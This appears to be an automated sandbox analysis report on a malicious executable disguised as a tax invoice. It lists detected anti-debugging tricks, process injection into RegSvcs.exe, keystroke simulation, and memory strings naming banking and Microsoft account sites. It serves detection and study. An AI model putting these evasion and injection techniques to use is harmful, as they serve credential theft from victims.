Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597930 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597696 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596563 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595436 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595084 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594850 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594078 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7624 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2224 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe API coverage: 4.5 %
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E8445A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C6D1 FindFirstFileW,FindClose, 0_2_00E8C6D1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E8C75C
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8EF95
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8F0F2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8F3F3
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E837EF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E83B12
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8BCBC
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00E249A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597930 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597696 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596563 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595436 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595084 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594850 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594078 Jump to behavior
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd6f1bd0b1aa93<
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: RegSvcs.exe, 00000002.00000002.3701305566.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E93F09 BlockInput, 0_2_00E93F09
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00E23B3A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E55A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00E55A7C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E24B37 LoadLibraryA,GetProcAddress, 0_2_00E24B37
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01662308 mov eax, dword ptr fs:[00000030h] 0_2_01662308
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01663928 mov eax, dword ptr fs:[00000030h] 0_2_01663928
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01663988 mov eax, dword ptr fs:[00000030h] 0_2_01663988
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_00E780A9
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E4A155
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4A124 SetUnhandledExceptionFilter, 0_2_00E4A124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 912008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E787B1 LogonUserW, 0_2_00E787B1
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00E23B3A
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00E248D7
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E84C7F mouse_event, 0_2_00E84C7F
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe" Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E77CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00E77CAF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E7874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00E7874B
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4862B cpuid 0_2_00E4862B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E54E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E54E87
